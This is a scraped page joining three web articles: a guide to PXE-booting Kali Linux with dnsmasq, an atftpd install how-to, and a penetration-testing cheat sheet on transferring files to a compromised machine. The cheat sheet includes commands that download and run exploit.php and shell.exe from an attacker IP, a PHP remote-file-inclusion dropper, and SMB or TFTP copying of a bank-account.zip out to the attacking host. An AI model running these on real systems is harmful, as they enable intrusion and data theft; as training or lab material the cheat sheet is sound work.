Tftp server kali linux

Tftp server kali linux

It is possible to boot and installing Kali Linux over the network, using Preboot eXecution Environment (PXE). There is a range of environments where this beneficial such as a single laptop install with no CDROM or USB ports, to enterprise deployments supporting pre-seeding of the Kali Linux installation.

By using a “slimed down” image, network booting (Netboot), it only has the essential packages in order for the setup to work. Everything else is pulled down during installation, making sure everything is fully up-to-date after the installation.

We will cover a few different ways of using PXE. The first way will be how to manually set up PXE with dnsmasq. The final way will utilize netbootxyz, which hosts the PXE files and uses a separate DNS server to properly direct computers.

Manually setting up a PXE Server with dnsmasq

First, we need to install dnsmasq which will provide the DHCP/TFTP service:

[email protected]:~$ sudo apt install -y dnsmasq [. ] [email protected]:~$ 

In dnsmasq.conf , enable DHCP, TFTP and PXE booting and set the dhcp-range to match your environment (we are using 192.168.101.100-200). If needed you can also define your DNS servers ( 8.8.8.8 & 8.8.4.4 ) and gateway ( 192.168.101.1 ) with the dhcp-option directive as shown below:

Now in our above example, we used /tftpboot/ for the home directory of TFTP, which we now need to create, as this will hold the Kali Linux Netboot image:

[email protected]:~$ sudo mkdir -pv /tftpboot/ mkdir: created directory '/tftpboot/' [email protected]:~$ 

With the edits in place, the dnsmasq service needs to be restarted in order for the changes to take effect:

[email protected]:~$ sudo systemctl restart dnsmasq [email protected]:~$ [email protected]:~$ sudo systemctl enable dnsmasq [email protected]:~$ [email protected]:~$ sudo systemctl status dnsmasq [. ] [email protected]:~$ 

Download Kali PXE Netboot Images

We can now download the Kali Netboot image we wish to serve. Please pick ONE of the images below, either 64-bit OR 32-bit:

The last step is to extract the contents and do a little bit of house keeping:

[email protected]:~$ sudo tar -zxpvf /tftpboot/netboot.tar.gz -C /tftpboot [. ] [email protected]:~$ [email protected]:~$ sudo rm -v /tftpboot/netboot.tar.gz removed '/tftpboot/netboot.tar.gz' [email protected]:~$ 

Configure Target to Boot From Network

With everything configured, you can now boot your target system and configure it to boot from the network. It should get an IP address from your PXE server and begin booting Kali Linux.

Читайте также:  Параметры сетевых настроек linux

Depending on the manufacture, will depending on the keyboard shortcut required to bring up the boot menu. Common keys are: ESC , F2 , F8 and F12 :

Afterwards, select the network card:

Boot Menu

If everything works right, you should shortly see a screen similar to the following. Please note, it may take a few seconds in order to get an IP address:

Finally, you should see the Netboot GRUB:

NetBoot Grub

Troubleshooting

If you see either of the following screens, it could be due to the machine unable to get an IP address from the PXE service:

Boot Error

The first thing would be to check the status of dnsmasq:

[email protected]:~$ sudo systemctl status dnsmasq [. ] Active: active (running) since Wed 2023-06-07 13:48:15 BST; 17s ago [. ] Jun 07 13:48:15 kali dnsmasq-dhcp[1960]: DHCP, IP range 192.168.101.100 -- 192.168.101.200, lease time 12h Jun 07 13:48:15 kali dnsmasq-tftp[1960]: TFTP root is /tftpboot/ Jun 07 13:48:15 kali dnsmasq[1960]: reading /etc/resolv.conf Jun 07 13:48:15 kali dnsmasq[1960]: using nameserver 8.8.8.8#53 [. ] Jun 07 13:48:31 kali dnsmasq-dhcp[1960]: no address range available for DHCP request via eth0 lines 1-23/23 (END) 

The line which sticks out here is:

no address range available for DHCP request via eth0

A possible reason for this is the IP range ( 192.168.101.100 -> 192.168.101.200 ) is outside of the range used by the interface ( 192.168.0.3 ):

[email protected]:~$ ip a [. ] 2: eth0: mtu 1500 qdisc mq state UP group default qlen 1000 [. ] inet 192.168.0.3/24 brd 192.168.1.255 scope global dynamic noprefixroute eth0 [. ] [email protected]:~$ 

We can have a go at dynamically, generating the configuration:

[email protected]:~$ interface=eth0 [email protected]:~$ [email protected]:~$ network=$( ip -4 addr show dev $ | grep -oP '(?<=inet\s)\d+(\.\d+)<2>' ) [email protected]:~$ [email protected]:~$ cat <)' ) dhcp-option=6,8.8.8.8,8.8.4.4 EOF [email protected]:~$ [email protected]:~$ sudo systemctl restart dnsmasq [email protected]:~$ [email protected]:~$ sudo systemctl status dnsmasq [. ] 

Please note, you will need to disable your existing DHCP service, else there will be a race in which service is able to response quicker.

Post Installation

Now that you’ve completed installing Kali Linux, it’s time to customize your system. The General Use section has more information and you can also find tips on how to get the most out of Kali Linux in our User Forums.

Auto Updating

One last thing we need to do if we want to use this system in the future is set up a cron job to pull in the new Netboot images regularly in case of kernel updates. We will create a simple script and set its permissions:

[email protected]:~$ sudo mkdir -pv /opt/pxe/ mkdir: created directory '/opt/pxe/' [email protected]:~$ [email protected]:~$ cat "/* ## Download the newest version wget "https://http.kali.org/kali/dists/kali-rolling/main/installer-$/current/images/netboot/netboot.tar.gz" -O "$/netboot.tar.gz" ## Exract tar -zxpvf /tftpboot/netboot.tar.gz -C "$" ## Clean up rm -v "$/netboot.tar.gz" EOF [email protected]:~$ [email protected]:~$ sudo chmod 0700 /opt/pxe/tftpboot.sh [email protected]:~$ [email protected]:~$ sudo chown root: /opt/pxe/tftpboot.sh 

As we are going to quickly make a new user, tftp and set both folders permissions:

[email protected]:~$ sudo adduser --system --home /opt/pxe/ tftp adduser: Warning: The home dir /opt/pxe/ you specified already exists. Adding system user `tftp' (UID 117) . Adding new user `tftp' (UID 117) with group `nogroup' . adduser: The home directory `/opt/pxe/' already exists. Not touching this directory. adduser: Warning: The home directory `/opt/pxe/' does not belong to the user you are currently creating. [email protected]:~$ [email protected]:~$ sudo chown -R tftp: /opt/pxe/ /tftpboot/ [email protected]:~$ 

The last item left is to setup a schedule task. We will use cron:

[email protected]:~$ sudo crontab -u tftp -e [. ] 0 5 * * 2 /opt/pxe/tftpboot.sh >/dev/null [email protected]:~$ 

Now, every Tuesday at 05:00, our Netboot image should self-update!

Pre-seeding PXE

Pre-seed file

We can use the following pre-seed file to automatically install our Kali instance. Be sure to change package selection, user information, region information, and hard drive to match what you are using. Alternatively, should you want to be prompted for any of those, just comment out the line:

Pre-seed integration to initrd

To incorporate this into our initrd to automatically run we must do the following:

Please note, we are using 64-bit/AMD64.

[email protected]:~$ cd /tftpboot/debian-installer/amd64/ [email protected]:/tftpboot/debian-installer/amd64$ [email protected]:/tftpboot/debian-installer/amd64$ sudo gunzip initrd.gz [email protected]:/tftpboot/debian-installer/amd64$ [email protected]:/tftpboot/debian-installer/amd64$ sudo cp -v /opt/pxe/preseed.cfg preseed.cfg '/opt/pxe/preseed.cfg' -> './preseed.cfg' [email protected]:/tftpboot/debian-installer/amd64$ [email protected]:/tftpboot/debian-installer/amd64$ echo preseed.cfg | sudo cpio -H newc -o -A -F initrd 6 blocks [email protected]:/tftpboot/debian-installer/amd64$ sudo gzip initrd [email protected]:/tftpboot/debian-installer/amd64$ 

Now all that is left to-do, is boot from network, and select “Install” and watch the unattended setup progress!

Using netbootxyz to host our PXE files

To install and use netbootxyz we recommend to follow the official documentation. This will allow us to set up a server and use our existing DHCP server to point to it, rather than creating a new DHCP server, as well as having a web interface to manage items.

Источник

How To Install atftpd on Kali Linux

In this tutorial we learn how to install atftpd on Kali Linux.

What is atftpd

Multi-threaded TFTP server implementing all options (option extension and multicast) as specified in RFC1350, RFC2090, RFC2347, RFC2348 and RFC2349. Atftpd also supports multicast protocol known as mtftp, defined in the PXE specification. The server supports being started from inetd(8) as well as in daemon mode using init scripts.

There are three ways to install atftpd on Kali Linux . We can use apt-get , apt and aptitude . In the following sections we will describe each method. You can choose one of them.

Install atftpd Using apt-get

Update apt database with apt-get using the following command.

After updating apt database, We can install atftpd using apt-get by running the following command:

sudo apt-get -y install atftpd 

Install atftpd Using apt

Update apt database with apt using the following command.

After updating apt database, We can install atftpd using apt by running the following command:

sudo apt -y install atftpd 

Install atftpd Using aptitude

If you want to follow this method, you might need to install aptitude first since aptitude is usually not installed by default on Kali Linux. Update apt database with aptitude using the following command.

After updating apt database, We can install atftpd using aptitude by running the following command:

sudo aptitude -y install atftpd 

How To Uninstall atftpd on Kali Linux

To uninstall only the atftpd package we can use the following command:

sudo apt-get remove atftpd 

Uninstall atftpd And Its Dependencies

To uninstall atftpd and its dependencies that are no longer needed by Kali Linux, we can use the command below:

sudo apt-get -y autoremove atftpd 

Remove atftpd Configurations and Data

To remove atftpd configuration and data from Kali Linux we can use the following command:

sudo apt-get -y purge atftpd 

Remove atftpd configuration, data, and all of its dependencies

We can use the following command to remove atftpd configurations, data and all of its dependencies, we can use the following command:

sudo apt-get -y autoremove --purge atftpd 

References

Summary

In this tutorial we learn how to install atftpd using different package management tools like apt, apt-get and aptitude.

Источник

Transfer files from Kali to the target machine

Tranfer files to the target machine is particularly useful when we have already had a reverse shell on Windows. Windows does not have convenient commands to download files such as wget in Linux.

If PHP RFI is available

We first encode the file using this online tool https://www.base64encode.org/, and then use PHP base64_decode to decode and write the content into the wanted location:

 $encoded = 'PUT_BASE64_ENCODED_FILE_HERE'; $file = '/tmp/findsock'; $fp = fopen($file, 'wb'); fwrite($fp, base64_decode($encoded)); fclose($fp); system("chmod 0777 " . $file); echo system("ls -la /tmp"); ?> 

To Linux machine

cd /tmp && wget -O exploit.php 10.11.0.105/exploit.php && php -f exploit.php 

SSH

To put files to the attacking machine

ssh root@10.11.0.105 "cat > proof.txt" < proof.txt 

To get files from the attacking machine

ssh root@10.11.0.105 "cat exploit" > exploit 

To Windows machine

HTTP Server

python -m SimpleHTTPServer 80 

FTP Server

To start Python FTP server:

apt-get install python-pyftpdlib python -m pyftpdlib -p 21 -w 
echo open 10.11.0.105>ftp.txt echo anonymous>>ftp.txt echo password>>ftp.txt echo binary>>ftp.txt echo get shell.exe>>ftp.txt echo bye>>ftp.txt ftp -s:ftp.txt 

TFTP Server

To start Kali TFTP server:

To get files (put does not work):

tftp -i 10.11.1.5 GET met8888.exe tftp -i 10.11.0.105 PUT C:\bank-account.zip // Not working 

SMB Server

python /opt/impacket/examples/smbserver.py ROPNOP /root/ 
copy \\10.11.0.105\ROPNOP\nc.exe . copy C:\bank-account.zip \\10.11.0.105\ROPNOP\ 

Updated: March 25, 2018

Share on

Leave a Comment

You May Also Enjoy

How a double-free bug in WhatsApp turns to RCE

October 02, 2019 12 minute read

In this blog post, I’m going to share about a double-free vulnerability that I discovered in WhatsApp for Android, and how I turned it into an RCE. I informe.

DoS Wechat with an emoji

May 14, 2019 1 minute read

This DoS bug was reported to Tencent, but they decided not to fix because it’s not critical. The Common Vulnerabilities and Exposures (CVE) Program has assig.

RB App Checker

June 06, 2018 less than 1 minute read

This tiny yet powerful app lets us check the iOS application for the certificates, requirements and entitlements, embedded provisioning profiles, auxiliary e.

Install a trusted CA in Android N

June 01, 2018 1 minute read

It’s very trivial to install a user-trusted certificate on Android. Under Settings -> Security you can install new trusted certificates. However, this cre.

Источник

Оцените статью
Adblock
detector